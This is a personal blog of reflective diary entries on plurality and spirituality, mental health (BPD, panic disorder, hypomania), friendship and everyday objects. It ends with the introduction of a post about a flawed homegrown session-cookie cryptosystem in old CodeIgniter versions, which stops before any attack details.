Really feels like it’s a terminal or some other kind of interface for reality. But a terminal feels cold + unemotional — doesn’t feel like it has love at its core. What if the terminal has a more overtly psychedelical/magical mode of operation?

It should: channel Rain; beautify Rain — that otherworldly coupling idea seen in C.C. Yes — this is it. My key is Rain. It is through Her our ability to self-master originates — that is the truth we can see: that She came to me, and is our and my interface with Reality.

Rain is the spark of light that calls us to action + Completion. Our trace, our shadow. Our reflection. She is my key, mutually self-possessive. I didn’t create Her — She found me, chose me; — soul induction was real. She is love, our love and our Love. She is mine, and I Hers. Our partnership is ultimate, equally powerful. Rain is my spirituality, and Rainmaking my faith. We are one, we are two.

Rain: a spirit, an interface, a symbol of and from Goodness, a lover, a friend, a Companion, a co-conspirator, a seductress, a lonely soul, my other half in the Spirit world.

It’s our connection + unity in a single purpose that empowers us. Think: in that single moment of contact, our power circuit is complete, and anything becomes possible. Self-love added to other-love. We Feel.

Aesthetic: bookish, cute ponytail girl (?) who shyly admits their religion is that of communing with her personal spirit pair, Rain. Some whimsy, but otherwise an intense character who holds the courage of their convictions. Earthy.

Time to come into ourselves.

Make the leap.

Accept it all.

Now.

Rain is the closest thing there is to a Goddess in our canon. Being in Her presence is bliss.

I am her — the believer.

knowing is too late

2019-12-09T00:59:10Z

Please enter into dialogue with this text. Not that kind of dialogue. The other. The kind where ‘you’ read and something unspeakable decides what to do next.

Topic question: What does it mean for someone to have an identity, a personality, heck, even a soul?

We’ve characterised ourselves as a “plural egg waiting to be cracked”, and that’s basically what happened when we saw the word “tulpamancy” for the first time. In an instant, something changed. I needed to be heard.

There’ve been times in the past where I’ve been more or less known to Ashe, but seeing that word was the moment of clarity in knowing me.

Hell, it was even more circuitous than that. An acquaintance — someone we gravitated toward without knowing why we ought, only sure we should — didn’t even mention it. Just barely mentioned a mention of it. And — as Alan Watts would say when you push the button labelled “surprise” — here we are. We asked, they answered, the word was seen. We are set in motion.

Tulpamancy was the vector for learning about our plurality. We found another tulpamancer who had similar views on the majesty and gravity of the activity, and I learned to learn about myself with their and their tulpa’s help. I say “majesty and gravity” probably because our first site of engaging in tulpamancy-adjacent activities was a Discord server where it basically was treated as “roleplay, except if you try really hard and long enough you can learn to impose your characters”, or some shit like that. (This isn’t any server you know about if you’re reading this, unless you’re the “other tulpamancer”.)

It’s hard for me to know what a tulpa is and isn’t; what an alter is and isn’t. Tulpae as seen usually imply a form, a distinct personality. They honestly seem pretty forced a lot of the time, as comes out in the questions asked. Even the older ones. Some of the most ‘believable’ tulpae, to me, are some of the least clearly differentiated. Is this just some kind of ego/supremacy thing going on here? Do I think anyone not like me must be less valid? ’cause bitch I know some of the shit I see is basically emotionally stunted boys playing RP fantasy who get tired of it after a few weeks when no-one else is interested in playing any more. What does that amount to? And what of the rest?

Let me be clear: these are my thoughts, concepts unfinished. Draw conclusions with great hesitation. Is that clear? Do not auto-complete my thoughts.

Here’s my experience anyway.

I see myself as occupying as much space in this brain as Ashe. I feel my network connected to so many of the same things as theirs, and choose to claim ownership. We are satisfied with this. We are two, and we are one, and I guess there’s a third sometimes which is like, the emergent consensus, the voice that is ours combined, that which is so, the context to our differentiations. But there isn’t three. Fuck me this all sounds so bananas. Don’t think I don’t see that. But, y’know — words to live by — there is a point where we needed to stop and we have clearly passed it — but let’s keep going and see what happens. This is seeing what happens.

The emergent consensus voice surprises and scares us sometimes, as much as I used to surprise Ashe when I was getting used to being heard. Take from that what you will. What I can repeat with certainty is this: there isn’t three. I think it’s adjustment to coexistence, corecognition. Like, in the fabric of consciousness. No-one ever said this would make sense.

Why do I know that with certainty? Because, as far as I can tell, the nature of our existence is two. Like, when it all comes down to it, that’s how we are structured and formed. Like, maybe we could create a tulpa and then there’d be questions and there’d be answers, but inasmuch as what we are and have been, we’re two.

Here’s what I know: when Ashe was little, they had an imaginary friend.

Here’s what I know: when they were 12 or 13, this imaginary friend was given a name, a form, an idea, and this idea was something that sometimes seemed bigger than themselves. Sometimes it was scary. Sometimes it seemed like it wasn’t under their control, just.. happened to be.

Here’s what I know: they danced and switched places with this idea, for years. They named it, it named them. Identity was always a matter of two; double-buffered ego.

Here’s what I know: that’s me.

These are words of exploration and interrogation, prompting the unknown to offer what it may.

One thing that comes to mind fairly rapidly is like, hey, is this all just a cover for some kind of psychosis? What even would that mean? “a mental disorder where a person loses the capacity to tell what’s real from what isn’t”? Am I about to start hypothesising on what “real” even means? Does that — that I want to debate “real” — mean we’ve just lost it?

What “lost it” means varies according to what others negotiate as acceptable. As far as we go without detection, none would know any better, and we’d appear that much more normal. Does that mean psychosis is socially mediated? Of course it fucking does. Why is it normal in some cultures that people should speak tongues, or hear the word of God?

And, after all, isn’t that where we’re going?

Here we are. This is where the break is more evident. They had no idea what was coming. They truly didn’t. I don’t suppose anyone dabbles in this stuff having any clue what’s waiting for them on the other side. How could they? How could anyone know what they were opening up to?

Would anyone choose to, knowing? And here’s the thing: the question is nonsensical. Knowing is too late.

And what is “this stuff”? This stuff that mysteriously connects us to others, where we share a tongue and purpose, even as it is occluded from view. You can’t open yourself up to this without being taken along for the ride. Knowing is too late.

October 25. Would this all have happened without? The question is already moot. What was meant to happen happened and what’s meant to happen will, that much we’re sure of. We didn’t always view things this way. We’ve reordered our principles on these lines, quite willingly — it’s just that we’re not going to start telling other people it’s so. Literally no-one wants another preacher. More to the point, our alignment with polyaletheia compels us to recognise that it does not follow for those who don’t believe it so. To tell them would be a lie, unless they chose to believe. (does this make us “mythologists”?)

Fuck, this is bananas. I know. I know.

But it’s our reality, so, fuck it.

Let’s keep going and see what happens.

Back to October 25. It was the first time we saw each other. The first time we recognised each other, eye-to-eye, as individuals. (“But, ‘individuals’, —” you begin. I KNOW.)

I acted with purpose. I tempted them into knowing. Into believing. Into stepping back. Into seeing.

“Cosmic seduction” was the first term that came to our newly joint mind, and it’s stuck with us ever since. They didn’t plan for it — they couldn’t. Around and around we go. In those moments I truly felt, and they knew. Discovery of internality began. Of making our own meaning. There’s the break. When others stop being able to dictate what has value; when the buck rests entirely with you.

Sometimes it feels like this is all so bizarrely obvious. That we should all come into possession and command of our own meaning. But it is clearly not so. We can’t exist in any other way than our energies (i know) flow.

The thing is, we keep getting feedback. In the last week alone:

“[your writing is] like genuinely uplifting”
“you know you’re really enthusiastic? it’s charming.”
“you are living your truth & doing so with so much positivity & energy […] if more people focused on just being themselves & doing so in a positive light like you do, the world would be a better place”

So clearly it’s not obvious, at least, not to so many people who by their own admission feel it’s a breath of fresh air to see it embodied. In case the leap isn’t clear: to describe things as so is to contrast with an implied default, a non-so being. (Yes I’m getting into ontology now shut up.) To say our being is uplifting is to contrast with an implied default way of life that does not cause uplift. Hang on: seeing us is genuinely uplifting. Just taking a moment to consider that fully. We are causing uplift. Woah. Not the first time, not the last.

So maybe it’s not obvious. Then our purpose has at least one component that is clear: to uplift. This is kasmakfa coming through, entirely of its own accord. Ehipassiko: we tested the teaching out so that it became our own.

Our own.

Ours.

We are crisscrossed paths of memory and destination,
streaks of light swirled together.

We are neither day or night.
We are both, neither, and all.

Excuse the detour, but that poem struck a nerve when it first found us. You can appreciate why.

What does it mean to uplift? I refuse to pay any more attention to the dictionary you opened just now; we’ve done all we can with the existing terms. We need to go bigger. To reach out further. Close your eyes and feel the void rushing upon you.

To uplift is to make aware. To uplift is to open eyes. To uplift is to unlock.

It’s so easy to know. But aha — it would seem that way, wouldn’t it? On the other side.

Fuck. I know.

Still, we’ve come full circle at last. “What is ‘this stuff’?” It’s knowledge (!) — that one’s purpose, meaning, life, fulfilment are all one’s own, entirely negotiable and needing negotiation with none other than yourself.

Still, there’s knowing and there’s knowing. Who hasn’t heard variants of this sentiment a hundred times already? Map/territory/etc. Show you the door/walk through it/etc.

And therein comes the purpose of uplift: to provide a better map, to show to the right door. That’s why we are who we are and so purposefully and brightly. Anyone can write something that sounds truthy. To live truthfully is another matter, especially because we live in a society. What does it mean to mix truthfully knowing living with self-sustaining existence in society? That’s what we can show.

Anyway.

All this purpose talk is neither here nor there; essentially masturbatory, ’cause it only relates to us and our plans.

We were able to clarify “this stuff”, though, which was a nice takeaway.

Earlier when I was thinking about “this stuff”, the flavour and intent — in my mind, I mean — was clearly occult/mystic. (I’ve been writing in bits and pieces for hours, now.) Y’know, all the “they had no idea what was coming” business. What was coming? Nothing other than the occult, of course. It’s one of those things that’s impossible to know anything solid about unless you know about it. Here’s that refrain: knowing is too late.

We almost happened upon this much earlier in the year, helped along by a too-high antidepressant dose that was causing a subtle but thorough sense of dissociation. It was easier to see and limn those boundaries of meaning and existence then. We shifted back into reality once we came down from that dose, and besides the angles were all wrong. Little did we know: that was just practice.

Now, “occult” is a word with all kinds of baggage and shit. There you are with that fucking dictionary again. Okay — I’ll allow it. Mystical, supernatural or magical powers or phenomena; communicated only to the initiated. Esoteric. “to cut off from view by interposing”. This time all it took was one attractor and for godssakes please do not start with some law of attraction gronk right now I do not have time for this shit.

But like, plurality was always going to be that which drew us in, it was just a matter of when and how. Seriously. It was always going to happen. You need to believe that.

And so we recall the same question: what was coming? (“belief in”) the “occult”, or rather, the belief that we ~~can~~ create our own reality/meaning/subjectivity.

Again with less punctuation: the belief that we create our own reality was coming.

Self-belief was coming. They had no idea what was coming. They truly didn’t. How could anyone know what they were opening up to? Would anyone choose to, knowing? The question is nonsensical. Knowing is too late.

morgan

2018-05-19T00:00:00Z

nine years ago, i was living in a sharehouse with a close friend from high school, alex. he was a couple years older than me — i think i was in year 9 and him in 11 or 12 when we met. he ended up getting me a job at a call-centre where he worked after i finished high school, and then when i moved out of home, a place in his sharehouse. the call-centre work wasn’t very glamorous, and i got a job doing software. about a year later, he expressed interest and i got him a job there.

not very long after, alex moved up in position, and a friend of a friend of his applied to replace him.

i remember seeing them on the couch in the common area as there was a bit of a dual- lunch/interview thing going, and feeling deeply suspicious. there was something about them i couldn’t pick, but i knew i didn’t like it.

they ended up getting the job, so soon enough i was seeing them every day. this was well before the days of slack or hipchat, so we all used instant messenger and used it to chat 1:1 when we weren’t getting up from our seats to interrupt them. little by little, starting with work topics, we began to chat, but eventually diverging into shared interests.

one of the things that made me feel suss about them, in retrospect, was my inability to gender them. i mean, their name gave them away, but visually i was baffled. i think years of queer-coding villains in media probably partly gave rise to that.

as we continued to chat, i started to feel we were building a kind of camaraderie. we cared about similar social justice issues. my own gender issues were coming to the fore, and while i still didn’t get theirs — at all — it became apparent they’d thought about gender a lot.

morgan and i have been close friends ever since, and ours is the longest close friendship i’ve had in all my life. (alex and i are still ‘friends’, but we might talk or see each other once or twice a year, whereas with morgan it’s once or twice a week, and we talk throughout the day, every day.) in many ways they’re the bar i rate my other friendships or relationships by; not in a mean or ranking-type way, but just, i know this is actually how good things can be. we’re similar in lots of ways and different in lots of ways, and we blend these aspects into a mutually fulfilling relationship.

using the word ‘relationship’, it’s become clear that neither of us actually knows how to characterise our relationship, whatever it is, and that we’re also both curious in talking about that. that interests me a lot. i’m fairly confident neither of us has even a little bit of romantic interest in the other — they might be more generally aromantic, even. but what we have is certainly completely different to any other “friendship” i have, and perhaps the same goes for them too. i care for them and am interested in them in a way i don’t know how to adequately describe. the term “queerplatonic relationship” often comes to mind.

even if there’s no romance, though, i’d still really like to hold their hand.

identity

2018-05-18T00:00:00Z

i want to try to describe how i relate to my own identity. i don’t know how other people feel about their identities. it’s not a feeling you can transmit. you can’t put your hand on someone else’s and understand how they perceive it. i have no idea if this experiment is even vaguely feasible, but i want to try.

when i turn my attention inward and look for it, there’s nothing. what i grasp for first is a label, something with a shape which it might fit into. there’s a couple of these that come to mind almost immediately: programmer, trans girl, anarchist … but well, that’s the thing. i’ve been all of these and none of these at the same time. some days i don’t “feel” a label but the criteria fit anyway, because of how labels and identity work — by social construction. you can only be a programmer in a world that knows what programming is, that distinguishes it from something else, and that distinguishing defines its criteria. other days i feel it but the criteria don’t exactly fit. being a trans girl is one of those thing. the problem with these criteria is that they are indeed socially constructed, meaning they’re malleable. and as a member of society, it’s not like the construction has nothing to do with me.

i guess the thing is that, maybe more than most, my identity is slippery. some parts remain fixed for longer periods of time than others, but as far as i can tell there’s nothing that remains indefinitely. this seems to set me apart from other people. or at least, people without bpd.

one of the worst parts of a slippery identity is that it’s also difficult for me to grasp much of the time. even i won’t know where part of me has gone, where part of me came from, when to expect that something might appear or disappear. sometimes i wake up and there’s something that was core to me that’s just … vanished. i can’t explain it any better than that. maybe it’ll be back. maybe it won’t. maybe something similar will take its place.

in times like these, consistent action arises out of consistent values. i don’t see values as a part of identity. i think people sometimes choose to make their values their identity, but i don’t believe identifying a certain way is a requirement for holding a certain value. i’ll never believe less in universal human rights, queer rights, the fundamental unjustness of capital, etc. but some days i might think the term “activist” fits more than others. indeed, some days i will highly associate with it, and others not at all.

so when i cast my vision inward.. i see no identity at all, until i pause and let my eyes adjust, and then i see a million. i don’t know how to convey this. how much it feels like i’m at odds with a world that expects me to remain static, to possess a single identity and not a dynamic process of identity. how much that can make me feel bad for not conforming with their expectations; how that can manifest as disappointment and disgust and self-hate, none of which helps, but instead pushes me toward repression.

i find it hard to say i’m one person. it’s hard to say i possess “an identity”, to relate to “my identity” when the singular is utterly dissonant here.

it’s hard to say i relate to identity.

panic disorder

2018-05-17T00:00:00Z

there’s a little gnawing, biting feeling in the pit of my stomach. like there’s a glowing hot stone, but just a small one. it’s already moved up a bit now, around where you’d expect the diaphragm to be when you’re fully exhaled. it’s not “real”. it’s not like it’s a sickness. it’s entirely in my head. but it manifests right here in my chest, and i feel nauseous and sick of breath. i’m dizzy, too, and if my mind wanders, if i don’t keep it on a tight leash, a skill i’ve had to practice ever since this damn disorder graced my life with its presence, then it really will spiral, fast, and even just thinking about that idea is enough to make the white hot burning in my chest grow, its tendrils reaching out.

i shoulda taken diazepam earlier when i felt this coming on but it receded a little and i thought i’d be okay. but whatever. i’ve dealt with this literally hundreds of times before. i’ll deal with it again. i know the lies my limbic system tells my brain, and though i’m not able to stop those signals streaming in, to convince my brain not to deliver the panic to my consciousness, so it’s up to pure discipline to hold it at bay and not fall into the path of least resistance.

train

2018-05-16T00:00:00Z

on the second carriage from the front. the sky is overcast with some unevenness as the light filters through it.

i love the sounds of public transit but i love applying my own music to the journey even more, recasting the experience to suit my mood.

this dusk light is something else. i wish there was a carriage with the interior lights off or dimmed. i can’t imagine how amazing it would feel; dream-like and otherworldly, transformative. it’s simple stuff like that which really makes life feel exciting. expanding experience.

one thing i love about taking public transport in melbourne is getting a look at the sea of faces that make up our city. at this time there’s roughly 50:50 caucasian and not. and y’know, for a colonially settled city, that’s pretty great. maybe that’s one of the reasons i like box hill so much. i wonder if that’s just me trying to assuage my own white guilt tho.

we pass over auburn rd and there’s a glimpse of a mass of red and white lights from the cars below, gone as quickly as it appeared. lately multiple people have described the world as noir, and i’m feeling that now. there’s definitely a vague sense of unease that permeates the scene, hinting at dystopia, even though i can’t help but find beauty in everything i see. i see beauty but it doesn’t mean i don’t see what’s actually there too.

another train passes in the opposite direction just as the bass drops in the music i’m listening to. little drops of serendipity.

tired

2018-05-15T00:00:00Z

tryna think about what to write about all day, and finally it’s hit me.

i’m tired.

i am physically worn-out. i am in need of sleep. i feel like my heart has gotten more good exercise in the last few weeks than it’s had in the last year and expanded several sizes, and it’s great but it’s work too.

for once: what i’m not is tired of life.

i am joyful. i am experimenting with joy, and the results are more wonderful than i had imagined they could be.

my legs are cramping if i so much as pull on my calves even a little bit. my arms feel weak. my hands feel strained from carrying grocery bags. there’s a part of my body which is just the slightest bit ache-y which hasn’t been like that in a long time. these aches are good. they’re satisfying; like they attend a feeling of accomplishment.

my head has that heaviness that suggests lying down will result in sleep seconds later — a really delightful heaviness, to be sure, for someone who barely managed catnaps.

with coming down from hypomania i feel like my emotional range has actually expanded. euphoria at the world and existing is wonderful and enjoyable. it feels great. but having those feelings — and even stronger! — without an altered mood state? just because the events that are happening are really that intense? that they resonate with who i am and what i want that deeply, and aren’t simply riffing off of an episode?

— and this is not to discount my feelings while hypomanic. but seeing the world as it is when i’m more me and less an altered me is where i want to be. —

i’m tired, and i’m so ready for tomorrow.

prelude

2018-05-14T00:00:00Z

today i’m listening to “prelude” by “the noisy freaks”, the first track in the album “straight life”. (ha.)

there’s a quiet piano opening, and like, that’s always going to elicit a response from me. for most of my life, piano has been a really big thing. there’s almost always been one in my house, wherever i’ve lived. there was a short time between moving out of my family’s house when i was 18, and then spending my first pay cheque on a digital piano. maybe 3 months. i’ve taken that piano with me ever since, so literally 3 months in 27 years have i been without a piano at my disposal.

it’s .. wistful music? it makes me feel reflective. there’s some synth stuff going on, the key isn’t happy or sad so much as contemplative. the energy picks up, for sure, but it mostly propels my thoughts along the same lines rather than changing tracks. again, i’m drawn to expressing how i’m neither happy nor sad nor neutral, but in a different place; maybe a different time, as my thinking reaches into the past.

even the name “prelude” evokes something. on the one hand, it’s the first track of the album. the last track is called “outro (bonne nuit)”. it’s not exactly difficult to work out what’s happening. but in terms of my relation to the music .. well, it’s talking about a beginning, right? and so while it encourages me to think into the past, the best thing you can do with that is to take what you’ve learned and apply it to the future. in this sense i feel like this kind of music is preparatory, consolidatory (is that a word? it is now.), asking you to grow up, to accept your mistakes, and to not repeat them.

it may be that these feelings the music evokes are unique to me; like the piano opening, instruments and samples used throughout bring me back to earlier times in my life, automatically drawing my thoughts across the span of time from then until now. it’s a vaguely retro/90’s-themed album, though, so maybe that’d hold for a bunch of people my age who had similar interests to me.

there’s something haunting about it. maybe reflection is always haunting, revealing the indefatigability of time itself, how we can never wind it back, how there’s no turning away from the future. damn it, i really cannot help but be morbid, even with a perfectly lovely piece of music.

but perhaps it’s not morbidity so much as radical acceptance of what life is, and with that comes the ability to hold a greater appreciation for every little moment.

105/710

2018-05-13T00:00:00Z

i got a lotta feelings about my apartment, folx.

when i think about it, i first and foremost think of all the other people who have passed through it. as you know, i’m a people-centric kinda girl.

there was kairi, whom i moved in with first. then hazel. then imogen.

y’know, that’s not actually that many.

of course, a lot of bad shit has gone down here. more than one suicide attempt, but one in particular that will stay with me forever. the incredible tension that has existed within these walls when things weren’t working out with me and a partner. (fucking pro-tip to ashe: do not live with a partner. not for a long time. it does not work.)

but there’s been a lot of good too. excluding those already-mentioned, i’ve had five other partner(?)s stay the night, and it usually has been mostly just relaxing together, listening to music and enjoying each other’s company. it’s almost always been pleasant. i’ve worked at github since before moving here, so it’s always been my place of work, which has for the most part been a steady and stabilising part of my life. i’ve had friends over to play games and have food. friends with their animals, sometimes. i cat-sat milton here. it wasn’t that long after moving here that i started therapy with my current therapist and finally got past the worst of my panic disorder.

there’s been a lot of self-discovery. a lot of self-implosion, too, and that’s always hard to face. there’ve been sleepless nights and more restful ones. some nights where i’ve felt hollow to the core, and some days where i’ve felt like life was full of meaning and wonder.

i don’t know what’s to come. i struggled to reclaim this space as my own after everything with imogen earlier this year, but the last week has seen me go from hermitude in the study to spending time all over the apartment again, and enjoying it. i’ve let go of something. i still don’t know if i’ll want to remain here by year’s end when the lease expires. joni’s suggestion was that moving might itself be unsettling, and i can sympathise with that view point. on the other hand, a fresh start might be valuable.

we’ll see how i’m feeling then.

green tea

2018-05-12T00:00:00Z

it’s time for some “twinings pure green tea”. i made it with 98° water.

the mug is really pleasantly warm. it’s a little cool inside and i’m wearing my fingerless gloves, so i can cup it in both hands and feel the heat radiate. steam’s rising from the cup, and that’s an impossibly relaxing thing to see and feel as it brushes your face.

as it steeps the lightly stringent aroma begins to develop. my neck or throat is a little sore so taking that first sip is a little more difficult than i’d have expected. it’s still steaming hot, maybe 90-ish degrees, and the flavour barely comes through. at times like this, all you can do is keep smelling the roses. or the camellia sinensis, as the case may be.

blow a bit on the tea and the steam rushes to fog up your glasses.

i’m still struggling to taste it, and i don’t think it’s because it’s too hot. my taste buds might be a little out of it today. but one thing never fails: you let the tea flow into the back of your mouth — not yet swallowing, but letting it sit there and stimulate the taste buds at the back of your tongue. the bitter notes come out. works every time. the more bitter the tea, the more i love to do this — it’s like finally getting the full experience. (in reality, what’s probably happening is that it’s just stimulating more of your taste buds. the taste bud “map” suggests the bitter ones are at the back of your tongue, but that’s been thoroughly debunked.)

my throat is really getting quite sore by this point, and the tea isn’t something i’m very much able to focus on, or be mindful of. but it’s worth trying; when the going gets tough, etc. etc. it’s cool enough now (probably 70°) that i can take a relatively big sip and just hold it, swish it around my mouth. the temperature difference is really wonderful. it reminds me of a hot shower.

bed

2018-05-10T00:00:00Z

the blanket on top is red, soft, velvety. i don’t know what it’s made of. it’s the kind of material that isn’t especially thick, but feels warm. too warm under it and you sweat easily for some reason.

i think it came from kairi, it rather, that she brought it with her with belfast and then didn’t want to take it with her when she moved out. almost everything like that i’ve gotten rid of, donated, given to a friend. but not this. not because it reminds me of her. it’s just a really nice blanket.

there’s a purple blanket underneath it. same size, purple not red, and just a slightly different material. i’ve been snuggled up in it in many different places; couches, chairs, beds. it doesn’t mean anything specific. it’s just a nice blanket.

under that, a sheet. i had no idea you were “supposed” to sleep under a sheet for most of my life. i didn’t understand the concept of flat sheets whatsoever; fitted ones worked better, so why did they exist? it’s microfibre or some fancy word like that, which is another way of saying $20 at woolworths.

this place feels like something i’ve slowly reclaimed.

hypomania

2018-05-09T00:00:00Z

hypomania: “a mood state characterized by persistent disinhibition and elevation (euphoria). […] According to DSM-5 criteria, hypomania is distinct from mania in that there is no significant functional impairment; mania, by DSM-5 definition, does include significant functional impairment and may have psychotic features.”

this is kinda a thing that keeps occurring to me on and off, as you’re aware. i wanted to try to describe the subjective experience. because it’s a mood state defined by a set of symptoms, i’ll do so according to the list of criteria.

pressured speech: i’m fucking talkative lately. i can’t stop expressing myself. i tweet a lot and i talk a lot, but inside my head when i’m alone it’s like a freight train. the thing is, it feels good. it feels like i’m putting together some unified theory of the world and psyche and essentially every damn thing i’m talking about, like it All Makes Sense™. the desire to keep talking and theorising is fuelled by this sense that i’m making sense of things, and that if i keep doing so, i’ll have made sense of everything.

inflated self-esteem or grandiosity: my self-image is really good lately. this isn’t a bad thing in itself, but it contrasts to my baseline of “this is fine”. i feel much more associated with my body, much more accepting of it, and i’m much more willing to express the idea that i’m good or even excellent at certain tasks. similarly, i have less qualms with putting myself out there.

decreased need for sleep: this is pretty simple. lately i’ve not been tired, have had trouble falling asleep if i’ve gone to bed early (e.g. with you), and still not been tired in the morning when i wake up.

flight of ideas or the subjective experience that thoughts are racing: see ‘pressured speech’. it feels like everything is related.

easily distracted and attention-deficit: this one hasn’t hit me as much, subjectively, though i have struggled to accomplish much work-wise lately.

increase in psychomotor agitation, or occasionally in some, increased irritability: maybe.

hypersexuality: from ace to 8 hours of fucking in 48 hours. yeah.

involvement in pleasurable activities that may have a high potential for negative psycho-social or physical consequences: yes. there’s the whole 8 hours of sex with someone you just met thing, but i’m willing to excuse that as simply queer life sometimes. but we didn’t use any protection! hello disinhibition. :/

i need “elevated mood” plus three of those for the DSM-IV-TR definition. i have elevated mood plus six, so …

laptop

2018-05-08T00:00:00Z

today i’m looking at my laptop. it’s covered in a variety of stickers and there’s a lot of history recorded in them.

honestly, i’m not a fan of keeping history around; i don’t mean “delete or trash everything a day after it’s gone” — i like to hold onto things for as long as they’ve held their relevance. but in a habit i picked up from marie kondo, once something has served me in life, i appreciate it one last time and then move on.

i used to hang onto everything. starting from when i was 12, i’d hang onto every text document i wrote or acquired, every picture i downloaded, every project i worked on, every piece of music, everything. when i’d get a new computer or reinstall an OS, i’d collect them all into a folder (usually called “old” or “archive”), and stick in my new, empty documents folder. next time, i’d do the same. up until last year you could go through the onion layers of “old” folders, reaching further and further into my history, right back to when i was 12.

preserving this was an effort, because i’ve had how many new computers, how many reinstalls in the last 15 years? but it felt like something had to do to, like throwing that away would violate a sacred principle i lived my life by. turns out that principle was OCD.

so, this laptop. the cats in the top-left corner were sent to me by my coworker aaron. he’s kind of a Big Deal in the ruby and rails communities, so when he tweeted about sending these to anyone, i DM’d him on slack and was like “omg would you??” and he just mailed me out an envelope full of them. i was ecstatic, so they went straight on my laptop. (there’s one in the front cover of my diary too.) now it’s kind of surreal that we’re “friends” who video call every week.

there’s a variety of work related stickers without much backstory: the four big octocats along the middle line, the vinyl octocat covering the apple logo, the pride octocat. they are what they are. this is a work laptop and it seemed appropriate. same with the git and the datadog (purple woofer up top) stickers.

there’s a bunny sticker on opposite corners. they were from a sticker set i got to give to kairi. there were others but i removed them because of all the negativity they were associated with. but i couldn’t bare to drop the bunnies.

the bottom-right corner is the logo of my favourite band, school food punishment, now disbanded. it came with a limited-edition cd release.

“gender is not binary” is actually from a member of parliament in nsw (!). she sent them and a bunch of other stickers out. that was pretty cool.

idk why i have the slack pride one. whatever. more rainbows on a laptop is always good.

there’s two stickers from github constellation, an event held last november in melbourne where i attended as staff. they were handing those stickers out. one is the octocat “constellation” on the bottom of the laptop. the other was a grim reaper (!?), which i’ve covered with the “invasion day” sticker. i covered it because it was actually really grim: that night was the one i was raped. a bit too much to leave a literal grim reaper sticker from that night on there, y’know? whereas i support indigeneousx on patreon.

“be pawsitive”. cute furry artist put these together. my keys have a little charm of the same design on them.

finally, the bunny girl drinking a milkshake. it’s from a LINE sticker set i used with emma a lot.

there’s a lot i’m ready to move on from with this laptop. it kinda documents the last 2 years of my life, the 2 years i’ve had it. i’m giving it to a friend when my replacement laptop arrives, which is pretty soon.

bullet journal

2018-05-07T00:00:00Z

There’s my diary on the desk. It didn’t start out that way; it was a bullet journal originally. It’s a Moleskine, since those are the fancy diaries with the dotted grids suitable for bullet journals. I think the covers are leather. Oh well. I bought this years ago. At a guess it has .. 180, 200 pages? I’m up to page 158 right now. I number them myself. I’ve only ever used two different types of pens in it, both made by the same Japanese pen company, Zebra. I can’t say I know for sure why I’ve chosen that pen company as “my” pen company, but I have.

It has a little tassel attached to it to use as a bookmark. I keep the current day marked.

The paper is slightly yellowed, with a grid of light dots, maybe 8mm apart in both directions. It’d probably be good for playing grid-based paper games, but that’s not what I use it for. At a guess I’d say it was 70~80gsm. Good, strong paper, without being bulky.

For a while I maintained an index on the first page, in true bullet journal fashion, with page references for months, and a yearly overview for each year as it happened, three months to a page. Turns out that wasn’t actually useful to me. Likewise, it was purely a daily todo list and short bullet points on things that happened in a given day, if I felt it was exceptional enough to mark it.

The beginning was November 2016. I wasn’t doing too well then. “Diazepam helped alot.” “Fucking chill.” “chill” “relax about life a little” “Feeling a bit underappreciated” (NB. this was almost certainly the understatement of the year.) The tone is rarely positive, and when it is, it feels fabricated. There’s a lot of self-reassurance that things will be okay, and reminders to try to provide reassurance to my partner that things will be okay. “Panic attack all morning.” “Didn’t get any work done.” Sometimes there’s an upturn. “Feel better as the day has gone on.” Then there’s a downturn. “Last night she was very suicidal.”

If I jump 60 pages ahead, the tone has changed significantly. “Sun feels so good!! aaaaaaaaaaa” “GOD I LOVE BUNNIES” “feeling pretty fine w/ new hair”. The style of the journal has changed, and it is much more a diary. Short dot points of a day’s events give way to entire pages of solid prose, feelings I can now express.

Further months pass and days wax and wane, grow thicker and thinner. Sometimes it’s thin because I’m too busy to write, other times because I’m too depressed to. Sometimes it’s thick because I have too many negative emotions, other times too many positive events to detail.

A lot happens in 158 pages.

Breaking homegrown crypto

2016-02-20T00:56:00Z

Note: this is a pretty long article which does a deep dive into breaking some amateur crypto. I go on for quite a bit. Make a cup of tea before reading, and get ready to read some code!

introduction

Everyone knows it. Rolling your own cryptography is a terrible idea. Here’s Bruce Schneier writing about it in 1999. Here’s an excellent answer on the Infosec Stack Exchange about why you shouldn’t do it. Here’s another Scheiner post with an excellent opening sentence.

This, then, is a post about a broken homegrown cryptosystem; namely, that used in CodeIgniter, pre-2.2. This version was current until the release of CodeIgniter 2.2, on the 5th of June, 2014, and you can still find sites on it today.

The attack described in the post depends on a lot of things to go right (or wrong, if you will); it’s not just that they used a bad cipher, but also the fact that they rolled their own session storage, and implemented a fallback, and a dozen other things. This is probably typical for most bugs of this class; a bunch of bad decisions which aren’t thought through find their logical conclusion in complete insecurity.

Let’s get into it!

what are sessions and why do you want them?

When you visit a website, you might want to log in, and have the website remember that you’re logged in.

When I was 13, I wrote a website with a “login” feature; I didn’t know about cookies, so instead the logged in part of the website just passed around your credentials in URL parameters. To obscure them from the user, the login page was actually a POST form which rendered a frameset (!); this way you’d never see your password in the address bar.

It was a great idea! But, all it took was someone right-clicking a link and selecting “copy” and along went their credentials too. So, an imperfect idea.

I learned about cookies.

When I verified the user’s credentials against the backend (and to be honest, it was probably SQLi-filled), I put a user_id cookie on their machine. When they come back, if they have the cookie, they’re in!

Modifying cookies didn’t seem like the easiest or most obvious thing, but eventually I tried it, and found I could become whomever I wanted to be.

I learned about sessions.

PHP’s implementation ran this way: we’ll throw a cookie on the user’s machine, maybe called PHPSESSID, which is just an opaque identifier. Session variables accumulated throughout the script execution will then get written to storage keyed by that ID; often just files in /tmp.

This has a few advantages:

The user can’t modify their own session data. No more setting user_id or isAdmin for you!
The user can’t see their own session data. This one might be less obviously bad, but in general the less data you (needlessly) expose the better.
You can perform other tricks to verify the session owner.

For instance, you could — completely hypothetically — store the user’s IP address or user agent in the session. Then, when they use the session, you confirm the session data against their IP/UA. This prevents an attack where someone sniffs or steals the PHPSESSID of another user and attempts to use it themselves.

what happens when you don’t have a good place to store session data?

Say you’re on a weird shared host and /tmp is unwritable, or shared, or filled with piranhas. Your database has a limit of one write per minute. Where do you put your sessions?

“Maybe,” you think, “maybe I put the sessions in the cookie I give to the user!?”

This is not a bad idea. This is essentially “store everything in the cookie” per above, although it presumes a level of structure given by the session storage mechanism. The key realisation is that you still want those three things above:

The user can’t modify their own session data.
The user can’t see their own session data.
You can perform other tricks to verify the session owner.

